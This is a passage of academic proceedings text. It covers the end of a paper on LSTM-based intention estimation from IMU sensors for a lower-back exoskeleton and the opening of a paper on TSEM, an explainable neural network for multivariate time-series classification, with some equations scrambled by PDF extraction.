In the lifting tasks the flexion and extension in the of the sagittal plane is the most significant in terms of the range of these movement. As a goal of the paper we are aimed at tracking this movement. The human spine models proposal that the lumbar spine can be modeled as additional joint in the contribution for flexion and extension and thought 2 we can see that the orientation of the pelvis in lifting task is also change.This is a reason why the costume needs to be
170
V. Zanina et al.
designed with sensors, which can track changes in trunk and pelvis orientation. It is impossible to leave only the sensors on the back because each person has its own style of the body movements. He or She can simply bend down as a stoop style and lift the load on the Fig. 4, but this motion can be traumatic for the body while picking up a heavy load.
Fig. 4. Stooping (a) and Squatting (b)
Another approach to lift is when the human is using only the legs, through a squat, minimally tilting the lower back. Therefore, we consider both variants of the movement, thus the controller in the target device will be capable of any of these intentions, minimizing the load on the lumbosacral joint. In this way the costume is designed as follows: 6 IMU sensors, 2 on the back, 2 on the left and right legs symmetrically fixed with elastic bands. Location of the sensors are presented in the Fig. 5. 3.3
Experimental Protocol
For the experiments, the subjects had to stand and squat to lift the load, and then straighten up with the this load. It is demonstrated on Fig. 6). This sequence of data is recorded in the dataset. After the researcher started the recording the subject is commanded after staying still for some time to do the experimental exercise in their own temp. We do not need to recognize the transition from one movement to another, like standing from the squat, because we want to know the intentions of a person and estimate the next few angles to control the motors of the exoskeleton. In this work the task is only considered when the subject starts to move. People do lifting tasks with different frequency and different speed, someone bends more with the body, and someone with their feet. During the experiments, it was noticed that it is impossible to lift a heavy load without tilting in the back and legs at the same time, so the selected location of the sensors and its quality can most accurately describe the movement for the back assistance exoskeleton.
DL Human Intention Estimation in Lower-Back Exoskeleton
171
Fig. 5. The scheme of sensors’ location with marked axes on a human body where the dot means that the axis come out and x means that the axis go away from the observer
3.4
Human Intention Estimation
The main task of an active exoskeleton is to repeat the movement of a person strengthening it. However, the exoskeleton must understand what action a person intends to do in order to switch to control mode and apply exactly as much force as necessary to start doing the action. Therefore, the estimation of human intention is a necessary task that needs to be solved when designing the control logic of an active exoskeleton. 3.5
Motion Prediction for the Exoskeleton Control with Deep Learning Approach
To develop an exoskeleton control system, estimation of intention can be divided on two tasks from the machine learning: classification and regression [17]. Classification implies the relation of a certain type of activity to a certain category, for example, standing, lifting a load or walking, in order to recognize that movement has begun and it is time to put the motors into active mode. An exoskeleton that provides help on the back should understand when it is necessary to start
172
V. Zanina et al.
Fig. 6. Experimental motion where (a) A person intends to lift the box through a squat, (b) A person is standing with a heavy load
making and not to interfere when it is needed. The regression task will allow predicting a person’s future intentions in advance in order to control the magnitude of torque of the motors of the exoskeleton. The model will allow to predict the subsequent angle of human movement based on the signals obtained from IMU sensors. 3.6
Long Short-Term Memory
The Long short-term memory (LSTM) architecture has been acknowledged as successful in human activity recognition on smartphones [13]. In addition to the outer recurrence of the RNN, LSTM recurrent networks have LSTM cells that have an internal recurrence. The cell of LSTM has more parameters and system of gating blocks that controls the flow of information but in general it has the same inputs and outputs. The cells replaced the hidden units of recurrent networks and are connected recurrently to each other. The key component of LSTM is the memory cell. The value of input feature can be accumulated into the state. The sigmoidal input gate needs to allows it. And the value is computed with a regular artificial neuron unit. The most important component is the state units, which has a linear self(t) loop. Its weight is controlled by a forget gate unit fi , where time step t and i is a cell. Forget gate unit sets this weight to a value between 0 and 1 due to a sigmoid unit: f (t) f (t−1) (t) , (1) Ui,j xi + Wi,j hj fi = σ bfi + j
(t)
j
where x is the current input vector, h is the current hidden layer vector, containing the outputs of all the LSTM cells, bf are biases, U f input weights, (t) W f recurrent weights for the forget gates. The external input gate unit gi is computed as:
DL Human Intention Estimation in Lower-Back Exoskeleton (t)
gi
g (t) g (t−1) = σ bgi + Ui,j xi + Wi,j hj . j
173
(2)
j
(t)
It is close to forget gate but with its own parameters. The output gate qi (4) uses a sigmoid unit for gating and thought it its can be shut off the output (t) of the LSTM cell hi on 3 (tz)
(t)
gi
(t)
= tanh (si z) qi
(3)
o (t) o (t−1) , = σ boi + Ui,j xi + Wi,j hj
(4)
hi
j
j
To scale and normalize the input to the proposed LSTM model we used MinMax scalar. All features are transformed into the range between 0 and 1. After scaling the input data, the data passed to the Deep learning model having one LSTM layer and one fully connected layer. The activation function is tanh and Adam [7] optimizer.
4
Implementation
This section presents implementation details starting from data extraction to deep learning model evaluation. 4.1
Hardware Implementation
The sensors were connected through wires with each other, which communicate over the I2C protocol, 2 sensors with different addresses on each bus, attached to a microcontroller ESP32. The hardware implementation of the costume is presented on the Fig. 7. The IMU sensor includes three-axis accelerometer, gyroscope and also magnetometer. However, during experiments, magnetometer data was not collected, since the presence of gravity on Earth, accelerometer perceive the downward direction, so its will be easy to calculate orientation. Magnetometer is not used for calculating yaw due magnetic field near the Earth if the gravity doesn’t changes. In the task we need to find orientation which describes rotation relative to some coordinate system thus the values we considered came only from two sensors - accelerometer and gyroscope. A typical accelerometer can measure acceleration in x, y, z axis in g or m/s2 . Gyroscopes measurements of angular speeds in degrees or rad in x,y, z axis are indeed. The ESP32 module was chosen because of its size and the possibility of easy programming, as well as due to the integrated Bluetooth and WiFi modules. During the experiments, data is transmitted through WiFi to a laptop in real time and processed locally.
174
V. Zanina et al.
Fig. 7. The hardware implementation of the costume for the data collecting
4.2
Data Format
The sensors data is sent once every 10 ms, and recorded in a CSV file for future training of the model. There are approximately 14 samples in one second. The raw data set is a sequence of values from 6 sensors. An example of the data from one IMU sensor for right leg which is located on a calf in the Table 1, where rb is the name id of the sensor, a - for value from accelerometer, g - gyroscope and x, y, z are the names of the axis. Table 1. The example of a part of the dataset with a raw data from accelerometer and Gyroscope located on a right calf
rbax
rbay
rbaz
rbgx
rbgy
rbgz
0.069431 –0.40701 9.267955 –0.015854 –0.006795 –0.010525 0.059855 –0.37589 9.229648 –0.041302 –0.001191 –0.01172 0.14604
–0.38307 9.090784 –0.041168 0.005729
–0.01705
0.15083
–0.36392 9.109938 –0.028378 0.01506
–0.013722
...
...
...
0.12689
–0.39025 9.040505 –0.024781 0.01811
...
...
...
–0.011990
The main body of the dataset contains 36 headers: 3 values for each axis of the accelerometer and gyroscope from all 6 sensors. Each column symbolizes the value of the axis of each sensor and each row is a corresponds to a one sample at the time. The bottom sensors on legs are located on calf, the top sensors located on a hip and both from the outer side. In the dataset values are arranged in the following order: back top and bottom, left leg top and bottom, right leg top and bottom. Each person moves several times, one file consist one experiment from one person but requires the future data preprocessing, each movement from one experiment will be in a separate file what will be discussed in the next subsection.
DL Human Intention Estimation in Lower-Back Exoskeleton
4.3
175
Feature Extraction
It is necessary to process raw data in order to turn them into features which are represented by orientation. Firstly, it is very important to calibrate the sensors before using them. There are always some errors due to mechanical characteristics. Calibration is performed by subtracting the offset value for each axis, since inertial sensors usually have the bias drift. The example is on Fig. 8.
Fig. 8. The example of calibration data from sensor, located on back top axes orientation
When the data is ready, the orientation values from the sensors are used as input data for estimation intention, and as an output value we will receive the next angle. To do this, it needs to translate the raw data into Euler angles: roll, pitch and yaw. Relying on the datasheet of selected modules, the axes on the sensors are signed as on Fig. 9. Based on the design of the data collection costume, the zero position of the sensors is vertical and the sensors on the back will be placed perpendicular to the sensors on the legs. Then the axes, along which the rotation will take place, will change their location and will look like in Fig. 5. Some of sensors will change their polarity of rotation, but because of the preprocessing the rotations will have a reversed polarity. As a result, the back will change positively, as will the data from the upper sensors of the legs, and the angle of the lower sensors will be directed in the opposite direction.
176
V. Zanina et al.
Fig. 9. Orientation of axes of sensitivity and polarity of rotation for accelerometer and gyroscope from datasheet
Location and orientation together fully describe how an object located in space. Euler’s rotation theorem shows that in three dimensions any orientation can be achieved by a single rotation around a fixed axis. This gives one general way to represent orientation using an axis angle representation. According to the trajectory of the selected lifting task movement and location of the sensors on the costume in the Fig. 5, we can take to account that for the legs we can estimate the human motion intention in the angle of rotation only the using z axis and for the back the angle of rotation of the x axis. We can estimate the orientation, but we can notice that the yaw angle for the sensors on legs and the roll for the back sensors will change significantly, when the others will change within the margin of error from person to person. Therefore, for the evaluation, we can allocate the correlation between the combination of these angles, varying over time. In fact, the angles of rotations can be calculated using one of the sensors, for example, an accelerometer. But this method is not suitable in our task, because it cannot calculate the rotation along the z axis. It is possible to use only gyroscope data for a discrete system according to the Eq. 5 θ = θ + ωΔt
(5)
where θ represents the angle in deg, ω is a angular speed in deg/s and Δ t is the time difference between measurements. So, roll, pitch, yaw can be calculated as: ⎞ ⎞ ⎛ ⎛ X pitchG pitchn+1 n + G Δt ⎝ rolln+1 ⎠ = ⎝ rollnG + GY Δt ⎠ (6) yawn+1 yawnG + GZ Δt The the resulting angles will be not so clear. The back top sensor located near 90◦ with roll, so the zero position will be over 90◦ , not zero, that why it is the best idea to use sensor fusion.
DL Human Intention Estimation in Lower-Back Exoskeleton
177
Sensor fusion is combining data derived from various sensors in order to get a resulting value that has less uncertainty than from the one sensor [20]. For this task some algorithms like Kalman, DCM algorithm with a rotation matrix and PI controller, Complimentary Filter or Madwgick algorithm can be used. In this paper the last one was selected. The Madgwick algorithm [9] is an orientation filter that can be applied to IMU or MARGS. It allows to get the orientation using the quaternions. These quaternions can be converted to Euler angles. In this work, this particular filter was chosen to search for Euler angles, since we need rotation angle changes only around certain axes. The filter takes into account the time delta between measurements and the beta value, which assigns the degree of confidence to the accelerometer. To estimate the trajectory of the lifting of the box, we will select the most significant axes and take it as a feature (Fig. 10) of intention to lift a heavy load.
Fig. 10. The change in the main angles of rotation during the lifting over time using the Madgwick filter
4.4
Performance Metric
The angle prediction for control lower-back exoskeleton was modeled by the deep learning model. The model’s goal was to minimize mean squared error between true and predicted angles of main rotations. Therefore to measure the performance of our proposed approach we use two popular performance measurements namely mean squared error (MSE) and coefficient of determination (R2 ) calculated as in Eq. 7 and 8. The plot of MSE function is in Fig. 13. n
1 M SE = (yi − yˆi)2 n i=1 R2 = 1 −
SSres , SStot
(7)
(8)
where the SSres is the residual sum of squares and SStot is the coefficient of determination.
178
5
V. Zanina et al.
Results and Discussion
The experiment involved 20 people (6 females and 14 males). Each participant did exercise several times - from 20 to 40 times for 15 to 20 s of each. Their age was from 20 to 38 years old. In total 700 samples were collected and they provided around 3.3 h of data. Figure 11 visualizes some of the participants in the experimentation stage.
Fig. 11. Some of the participants of the experiments. All participants authorized to use these photos
For training data, a time series was recorded where a person stood still and then intended to lift the load. Each person squatted in their own style, at different speeds and at different times. The dataset with different data was collected and processed. Figure 12 presents some examples of the samples from the collected data, on which the neural network was trained to predict the following angles. Based on the data, it can be noticed that each person does the exercise in his own style. For example, the person 3 on the figure above squats more then bends his back. The person 2 bends more to lift the load by tilting his back. Therefore, the neural network works independently of the physiological characteristics of each individual and does not require re-training for a specific user of an exoskeleton (Table 2).
DL Human Intention Estimation in Lower-Back Exoskeleton
179
Fig. 12. The example of some train data from the collected dataset with the changing the main orientation angles during a lifting task Table 2. Proposed model performance
Dataset partition Total samples MSE R2 Train
455
0.66
0.999
Validation
140
0.7
0.998
Test
105
0.3
0.994
For training the data was divided on 15 segments in order to predict next 5 segments and took six-component vector as input which corresponds to the rotations. This coefficient of the model on the validation set is 0.994 (Fig. 14), so the model is good. The data points were taken in a sliding window of size 5, calculated the absolute gradients for a line of best fit and if the gradient is greater then 0.5 it means the person is moving. To mark the start and the end of movement, the first gradient greater than 0.5 is mark and the last gradient greater than 0.5 is the mark of stopping the movement. The Fig. 15 presents the performance of our approach on test data. The error is no more than 4◦ . It can be noticed that the our proposed model will not work well if the sensors are not located properly. The error in the predicted data can be minimized by conducting a large number of experiments and retraining the model on a larger number of subjects. It is worth noting that the data was collected only inside the building, which does not allow the dataset to be more various since activity in the elevator or airplane was not taken into account. In these scenarios, the force acts on the accelerometer sensors, and in some applications it may be important to take these facts into account. The source code is available1 . 1
https://github.com/Demilaris/human intention.
180
V. Zanina et al.
Fig. 13. The MSE loss for training and validation set
Fig. 14. The coefficient of determination (R2 ) for training and validation set
Fig. 15. The predicted and true trajectory of human motion during lifting tasks where black lines denote the beginning of the movement
DL Human Intention Estimation in Lower-Back Exoskeleton
6
181
Conclusion
In paper we propose a method of human intention estimation with wearable robotics costume based on IMU sensors using deep learning based approach. The purpose of this work is to increase the versatility of exoskeletons and to apply an advance automatic control to them. A hardware costume was made and experiments were conducted. The data was collected, segmented, and preprocessed, the features were selected and extracted. The obtained dataset for evaluating human intentions is used for training a deep learning model. As result we get MSE of 0.3 and R2 of 0.994. For prediction we used LSTM model with rotation degrees as input. Our approach shows a good result with average error of only 4◦ . We examined the error and found that it occurs at the peak of the values. The real-time delay does not exceed 50 ms. Moreover, we published our dataset for human activity recognition and intention estimation for everyone to use it in their way. For the future, the performance of the our deep recurrent model can be improved by increasing the number of experiments and adding regularization which will minimise over-fitting.
References 1. Badawi, A.A., Al-Kabbany, A., Shaban, H.: Multimodal human activity recognition from wearable inertial sensors using machine learning. In: 2018 IEEE-EMBS Conference on Biomedical Engineering and Sciences (IECBES), pp. 402–407. IEEE (2018) 2. Chereshnev, R., Kert´esz-Farkas, A.: HuGaDB: human gait database for activity recognition from wearable inertial sensor networks. In: van der Aalst, W.M.P., et al. (eds.) AIST 2017. LNCS, vol. 10716, pp. 131–141. Springer, Cham (2018). https://doi.org/10.1007/978-3-319-73013-4 12 3. Fang, B., et al.: Gait neural network for human-exoskeleton interaction. Front. Neurorobot. 14, 58 (2020) 4. Ghazal, S., Khan, U.S., Mubasher Saleem, M., Rashid, N., Iqbal, J.: Human activity recognition using 2D skeleton data and supervised machine learning. Inst. Eng. Technol. 13 (2019) 5. Ionescu, C., Papava, D., Olaru, V., Sminchisescu, C.: Human3.6m: large scale datasets and predictive methods for 3D human sensing in natural environments. IEEE Trans. Pattern Anal. Mach. Intell. 36, 1325–1339 (2014) 6. Khandelwal, S., Wickstr¨ om, N.: Evaluation of the performance of accelerometerbased gait event detection algorithms in different real-world scenarios using the MAREA gait database. Gait Posture 51, 84–90 (2017) 7. Kingma, D.P., Ba, J.: Adam: a method for stochastic optimization. arXiv preprint arXiv:1412.6980 (2014) 8. Kwon, H., et al.: IMUTube: automatic extraction of virtual on-body accelerometry from video for human activity recognition. Proc. ACM Interact. Mob. Wearable Ubiquitous Technol. 4(3), 1–29 (2020) 9. Madgwick, S., et al.: An efficient orientation filter for inertial and inertial/magnetic sensor arrays. Report x-io Univ. Bristol (UK) 25, 113–118 (2010) 10. Mak, S.K.D., Accoto, D.: Review of current spinal robotic orthoses. In: Healthcare, no. 1, p. 70. MDPI (2021)
182
V. Zanina et al.
11. Manns, P., Sreenivasa, M., Millard, M., Mombaur, K.: Motion optimization and parameter identification for a human and lower back exoskeleton model. IEEE Robot. Autom. Lett. 2, 1564–1570 (2017) 12. Martinez, J., Black, M.J., Romero, J.: On human motion prediction using recurrent neural networks. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 2891–2900 (2017) 13. Milenkoski, M., Trivodaliev, K., Kalajdziski, S., Jovanov, M., Stojkoska, B.R.: Real time human activity recognition on smartphones using lstm networks. In: 2018 41st International Convention on Information and Communication Technology, Electronics and Microelectronics (MIPRO), pp. 1126–1131. IEEE (2018) 14. N¨ af, M.B., Koopman, A.S., Baltrusch, S., Rodriguez-Guerrero, C., Vanderborght, B., Lefeber, D.: Passive back support exoskeleton improves range of motion using flexible beams. Frontiers in Robotics and AI, p. 72 (2018) 15. Poliero, T., et al.: A case study on occupational back-support exoskeletons versatility in lifting and carrying. In: The 14th PErvasive Technologies Related to Assistive Environments Conference, pp. 210–217 (2021) 16. Poliero, T., Mancini, L., Caldwell, D.G., Ortiz, J.: Enhancing back-support exoskeleton versatility based on human activity recognition. In: 2019 Wearable Robotics Association Conference (WearRAcon), pp. 86–91. IEEE (2019) 17. Radivojac, P., White, M.: Machine Learning Handbook (2019) 18. Reiss, A., Stricker, D.: Creating and benchmarking a new dataset for physical activity monitoring. In: Proceedings of the 5th International Conference on PErvasive Technologies Related to Assistive Environments, pp. 1–8 (2012) 19. Roveda, L., Savani, L., Arlati, S., Dinon, T., Legnani, G., Tosatti, L.M.: Design methodology of an active back-support exoskeleton with adaptable backbone-based kinematics. Int. J. Ind. Ergon. 79, 102991 (2020) 20. Sasiadek, J.Z.: Sensor fusion. Annu. Rev. Control 26(2), 203–228 (2002) 21. Shotton, J., et al.: Real-time human pose recognition in parts from single depth images. In: CVPR 2011, pp. 1297–1304. IEEE (2011) 22. Sousa Lima, W., Souto, E., El-Khatib, K., Jalali, R., Gama, J.: Human activity recognition using inertial sensors in a smartphone: an overview. Sensors 19(14), 3213 (2019) 23. Toxiri, S., et al.: Back-support exoskeletons for occupational use: an overview of technological advances and trends. IISE Trans. Occup. Ergon. Hum. Factors 7(34), 237–249 (2019) 24. Wang, H., Zhang, R., Li, Z.: Research on gait recognition of exoskeleton robot based on DTW algorithm. In: Proceedings of the 5th International Conference on Control Engineering and Artificial Intelligence, pp. 147–152 (2021) 25. Wang, J., Chen, Y., Hao, S., Peng, X., Hu, L.: Deep learning for sensor-based activity recognition: a survey. Pattern Recognit. Lett. 119, 3–11 (2019) 26. Yadav, S.K., Tiwari, K., Pandey, H.M., Akbar, S.A.: Skeleton-based human activity recognition using ConvLSTM and guided feature learning. Soft Comput. 26(2), 877–890 (2022) 27. Zhang, M., Sawchuk, A.A.: USC-HAD: a daily activity dataset for ubiquitous activity recognition using wearable sensors. In: Proceedings of the 2012 ACM Conference on Ubiquitous Computing, pp. 1036–1043 (2012)
TSEM: Temporally-Weighted Spatiotemporal Explainable Neural Network for Multivariate Time Series Anh-Duy Pham(B) , Anastassia Kuestenmacher, and Paul G. Ploeger Hochschule Bonn-Rhein-Sieg, Sankt Augustin, Germany [email protected], {anastassia.kuestenmacher,paul.ploeger}@h-brs.de Abstract. Deep learning has become a one-size-fits-all solution for technical and business domains thanks to its flexibility and adaptability. It is implemented using opaque models, which unfortunately undermines the outcome’s trustworthiness. In order to have a better understanding of the behavior of a system, particularly one driven by time series, a look inside a deep learning model so-called post-hoc eXplainable Artificial Intelligence (XAI) approaches, is important. There are two major types of XAI for time series data: model-agnostic and model-specific. Modelspecific approach is considered in this work. While other approaches employ either Class Activation Mapping (CAM) or Attention Mechanism, we merge the two strategies into a single system, simply called the Temporally Weighted Spatiotemporal Explainable Neural Network for Multivariate Time Series (TSEM). TSEM combines the capabilities of RNN and CNN models in such a way that RNN hidden units are employed as attention weights for the CNN feature maps’ temporal axis. The result shows that TSEM outperforms XCM. It is similar to STAM in terms of accuracy, while also satisfying a number of interpretability criteria, including causality, fidelity, and spatiotemporality. Keywords: Temporally-weighted · Explainability · Attention · CNN RNN · Spatiotemporality · Multivariate time series classification
1
·
Introduction
Multivariate time series analysis is used in many sensor-based industrial applications. Several advanced machine learning algorithms have achieved state-of-theart classification accuracy in this field, but they are opaque because they encode important properties in fragmented, impenetrable intermediate layers. In Fig. 1, the positions of the cat and the dog are clear, but the signal from the three sensors is perplexing, even with explanations. This is perilous because adversarial attacks can exploit this confusion by manipulating the inputs with intentional noise to trick the classification model to yield a wrong decision. Multivariate time series (MTS) are challenging to classify due to the underlying multi-dimensional link among elemental properties. As Industry 4.0 develops, a sensor system is c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 183–204, 2023. https://doi.org/10.1007/978-3-031-28073-3_13
184
A.-D. Pham et al.
incorporated into production and operational systems to monitor processes and automate repetitive tasks. Hence, given the high accuracy of multivariate time series classification algorithms, it is crucial to understand the precise rationale for their conclusions, particularly in precision manufacturing or operations such as autonomous driving. This is when interpretable techniques become useful.
Fig. 1. Explanations given by gradient-based class activation mapping method
Generally, in the diversity of interpretable AI methods, there are three main categories, namely interpretable-by-design, model-agnostic and model-specific ones. The interpretable-by-design models are those that were built with the intention of giving an explanation. Although they are of classical methods, such as decision trees and general linear models, they still give contributions to the novel interpretable applications as graph neural networks [19], a decision tree [17], or by comparing to archetypal instances [5], conditioning neurons to interpretable properties [11,13], and statistically accounting evidence from various image patches [3]. On the other hand, model-agnostic and model-specific explainable methods are applied to models that are not interpretable-by-design. The model-agnostic techniques are methods that may be used to any predictive model, while the model-specific methods are methods that are linked to a particular model class. In this work, only model-specific interpretable methods are analyzed. Post-hoc analysis, which explains the decision of a model by analyzing its output, and ante-hoc analysis, which provides an explanation as part of its decision, are the two ways that explanations could be extracted from a model regardless of whether the method is model-agnostic or model-specific. Nevertheless, there are two ways that explanations could be extracted from a model regardless of whether the method is model-specific or model-agnostic [10]. Class Activation Mapping (CAM)-based approaches that give post-hoc explanations for the output of a Convolutional Neural Network (CNN) and Attention-based Recurrent Neural Networks (RNNs) with their attention vectors as the ante-hoc explanation are analyzed in this research.
TSEM
185
This study proposes the Temporally weighted Spatiotemporal Explainable Network for Multivariate Time Series (TSEM), a novel method that overcomes several shortcomings of previous interpretations by leveraging the power of RNN to extract global temporal features from the input as an importance weight vector for the CNN-generated spatiotemporal feature maps in a parallel branch of the network. We show that our method could fix the locality of the explanations along the temporal axis yielded by 1D convolutional layers, while also improving the overall performance of the model, as the temporal information could now be directly weighted into the feature maps, as opposed to merely serving as supplementary information, as it is the case in XCM [7]. Then, the saliency maps are extracted from the weighted feature maps by CAM methods. Despite the fact that CAM only gives local fidelity with CNN saliency maps, attention neural models are unable to provide consistent explanations for classification RNN models when compared to CAM explanations [12]. Apart from being faithful, such an explanation should satisfy two additional assessment criteria, namely spatiotemporal explainability, and causality [9]. The rest of this paper is arranged in the following manner. Section 2 summarizes recent research on transparency in the realm of MTS classification. Section 3 explains the novel TSEM architecture and how its outputs should be interpreted. Section 4 details the experiments and methods of assessment. Section 5 summarizes the method’s accomplishments and offers more perspectives on how to improve it.
2 2.1
Related Work Attention Neural Models
In terms of efficiency in learning long-term correlations between values in a time series, the RNN layer may also be preserved in a neural network to retain information over an extended period of time, enabling more precise classification. The interpretation is then compensated by wrapping an attention neural model around the RNN layer to obtain additional information about the time series region of interest, which may improve the learning operation of the RNN layer. In addition, the attention neural model may offer input to the coupling RNN layer, instructing it to highlight the most important data. Numerous MTS classification and regression models have been published. This kind of architectures begins with the Reverse Time Attention Model (RETAIN) [6], which utilizes a two-layer neural attention model in reverse time order to emphasize the most recent time steps. Dual-Stage Attention-Based Recurrent Neural Network (DA-RNN) [20] adopts the concept of RETAIN but without the temporal order reversal, while Dual-Stage Two-Phase attentionbased Recurrent Neural Network (DSTP-RNN) [15] advances DA-RNN by dividing the spatial attention stage into two substages, or two phases. The Multi-level attention networks for geo-sensory time series (GeoMAN) [14]similarly has two stages of attention, but in the spatial stage, it incorporates two parallel states: the local one correlates intra-sensory interactions, while the global one correlates
186
A.-D. Pham et al.
inter-sensory ones. Spatiotemporal attention for multivariate time series prediction (STAM) [9] focused primarily on temporal feature extraction by assigning two attention vectors with independent RNN wrappers while decreasing the number of phases in the spatial attention stage to one. 2.2
Post-Hoc Model-Specific Convolutional Neural Network-Based Models
An LSTM layer is designed to learn the intercorrelation between values along the time dimension, which is always a one-dimensional sequence; hence, the layer can be replaced solely by a one-dimensional convolutional layer. Using this concept, Roy Assaf et al. [1] created the Multivariate Time Sequence Explainable Convolutional Neural Network (MTEX-CNN), a serial two-stage convolutional neural network consisting of a series of Conv2D layers coupled to a series of 1D convolutional (Conv1D) layers. Similarly, Kevin Fauvel et al. [7] obtained the two convolutional layers by linking them in parallel, believing that this would give an extra temporal interpretation for the neural network’s predictions. The eXplainable Convolutional Neural Network for Multivariate Time Series Classification (XCM) architecture provides a faithful local explanation to the prediction of the model as well as a high overall accuracy for the prediction of the model. Furthermore, as shown by the author of this research, the CNN-based structure allows the model to converge quicker than the RNN-based structure while also having lesser variation across epochs. Besides that, in their paper [7], XCM demonstrated their state of the art performance. By switching from a serial to a parallel framework, XCM was able to considerably enhance the performance of MTEX-CNN. Specifically, the information from the input data is received directly by both 1D and 2D modules; as a result, the extracted features are more glued to the input than if the data were taken from another module. However, they combine these two types of information, known as spatial and temporal features, by concatenating the temporal one as an additional feature vector to the spatial feature map and then using another Conv1D layer to learn the association between the temporal map and the spatial map, as shown in Fig. 2. This approach entails the following limitation: (1) The intermediate feature map has the form (feature length +1, time length), and it leads to the explanation map, which has the same size as the intermediate feature map. This is out of sync with the size of the input data, which is (feature length, time length) and (2) while it is assumed that the final Conv1D layer will be able to associate the relationship between the concatenated map, the Conv1D layer will only be able to extract local features, whereas temporal features require long-term dependencies in order to achieve a more accurate correlation between time steps. In order to address these issues, TSEM is proposed as an architecture that makes better use of the temporal features by adding up values to the spatial features, even seemingly spatiotemporal features, yielded from the 2D convolutional (Conv2D) layers by multiplying them together and replaces the Conv1D layer with an LSTM layer, which can be better weighted in the spatial-temporal feature maps.
TSEM
2.3
187
Explanation Extraction by Class Activation Mapping
Class Activation Mapping (CAM) methods determine which input characteristics are accountable for a certain categorization result. This is accomplished by performing backpropagation from the output logits to the desired layer to extract the activation or saliency maps of the appropriate features, and then interpolating these maps to the input to emphasize the accountable ones. CAM [25] is the original approach, which uses the max-pooling layer to link the final convolutional layer with the logits layer in order to immediately remedy the liable features in the latter. Then, CAM becomes the general method name for this strategy and is further classified into two domains, excluding itself: gradientbased CAM and score-based CAM. The gradient-based CAM group consists of algorithms that backpropagate the gradient from the logits layer in order to weight the feature maps of the associated convolutional layer. They are listed as Grad-CAM [22], Grad-CAM++ [4], Smooth Grad-CAM++ [18], XGrad-CAM [8], and Ablation-CAM [21], and are distinguished by their formulation for the combination of the backpropagated weights gradients and the weight. In contrast, score-based approaches such as Score-CAM [24], Integrated Score-CAM [16], Activation-Smoothed Score-CAM [23], and Input-Smoothed Score-CAM [23] employ the logits to directly weight the convolutional layer of interest. They also vary in their concept of the combination of scores and feature maps through multiplication.
3
Methodology
The XCM acquires a basic CNN developed to extract features from the input data’s variables and timestamps. It ensures the model choice made using GradCAM [22] is interpretable faithfully. On a variety of UEA datasets, XCM beats state-of-the-art techniques for MTS classification [2]. Since faithfulness evaluates the relationship between the explanation and what the model computes, it is critical when describing a model to its end-user. The purpose of this study is to develop a small yet scalable and explainable CNN model that is true to its prediction. The combination of CNN architecture with Grad-CAM enables the creation of designs with few parameters while maintaining accuracy and transparency. MTEX-CNN demonstrated the preceding by proposing a serial connection of 2D and Conv1D layers for the purpose of extracting essential characteristics from MTS. To leverage the above mentioned drawback of CNN post-hoc explanations, TSEM takes the backbone of the XCM architecture and improves it by replacing the Conv1D module, which includes two Conv1D layers in the second parallel branch of the architecture, with a single recurrent layer in the first parallel branch of the architecture, as previously stated. The time window aspect of the model has also been retained since it aids in scaling the model to a fraction of the input size when the data dimensions are too huge. Figure 3 depicts the overall architecture.
188
A.-D. Pham et al.
Fig. 2. XCM architecture [7]. Abbreviations: BN—Batch Normalization, D—Number of Observed Variables, F—Number of Filters, T—Time Series Length and Window Size—Kernel Size, which corresponds to the time window size
Fig. 3. TSEM architecture. Abbreviations: BN—Batch Normalization, D—Number of Observed Variables, F—Number of Filters, T—Time Series Length and Window Size— Kernel Size, which corresponds to the time window size.
Formally, the input MTS is simultaneously fed into two different branches that consider each of its two dimensions, namely spatial and temporal ones. The spatial branch is designed to extract the spatial information spanned across the constituent time series by firstly applying a convolutional filter with a customized kernel size with one side fixed to the length of temporal axis of the MTS. This is done to reduce the number of model parameters and increase the training as well as inference speed. It is then followed by a 1x1 Conv2D layers to collapse the number of previous filters into one filter, making the shape of the resulting feature map equalled to the input. The idea is proposed by Fauvel et al. [7] in their XCM architecture and kept as the backbone in our architecture, TSEM. In the temporal branch, since the temporal explanation is redundant when the first branch can extract the spatiotemporal explanation, the Conv1D module is replaced with an LSTM module with a number of hidden units equal to the window size hyperparameter. The substitution sacrifices the explainability
TSEM
189
of the Conv1D module in exchange for improved temporal features because the LSTM module treats the time series signal as a continuous input rather than a discrete one as in the convolutional. It is then upsampled to the size of the original time duration and element-wise multiplied with the feature maps from the first branch’s two-dimensional convolutional module instead of being concatenated as in the temporal branch of XCM (Fig. 2). This results in time-weighted spatiotemporal forward feature maps from which the explanation map may be retrieved by different CAM-based techniques. Additionally, the new feature map is considered to improve accuracy when compared to XCM.
4
Experiments and Evaluation
The assessment entails conducting tests for critical metrics that an interpretation should adhere to, as recommended and experimented with in several works on interpretable or post-hoc interpretability approaches. 4.1
Baselines
TSEM is evaluated in comparison to all of the attention neural models as well as post-hoc model-specific CNN-based models that are outlined in Sects. 2.1, 2.2. These includes five attention neural models, namely, RETAIN, DA-RNN, DSTPRNN, GeoMAN and STAM as well as some of their possible variants along with MTEX-CNN and XCM, which are the two model-specific interpretable models. It is important to note that in the interpretability tests, the post-hoc analysis of MTEX-CNN and XCM is supplied by each of the explanation extraction techniques stated also in Sect. 2.3 and compared among them. 4.2
Accuracy
Before delving into why the model produced such exact output, it is necessary to establish an accurate prediction model. As a consequence, inherently or post-hoc interpretable models must be assessed on their capacity to attain high accuracy when given the same set of datasets in order to compare their performance objectively. As indicated before, the XCM architecture has shown its performance and that of the MTEX-CNN on classification tasks utilizing the UEA Archive of diverse MTS datasets [2]. The comparisons are done using model accuracy as the assessment measure, and a table of model accuracy reports is then generated for each of the experimental models over all datasets in the UEA archive. Additionally, a critical difference chart is constructed to illustrate the performance of each model more intuitively by aligning them along a line marked with the difference level from the reported accuracy table.
190
A.-D. Pham et al.
Datasets. The UEA multivariate time series classification archive [2] has 30 datasets that span across six categories, including Human Activity Recognition, Motion Classification, ECG Classification, EEG/MEG Classification, and Audio Spectra Classification. As was the case with other sources of datasets, this was a collaborative effort between academics at the University of California, Riverside (UCR) and the University of East Anglia (UEA). All the time series within one dataset has the same length, and no missing values or infinity values occur. Accuracy Metrics. After training on the aforementioned datasets, each model is assessed using the following accuracy score. Accuracy =
TP + TN , TP + FP + TN + FN
(1)
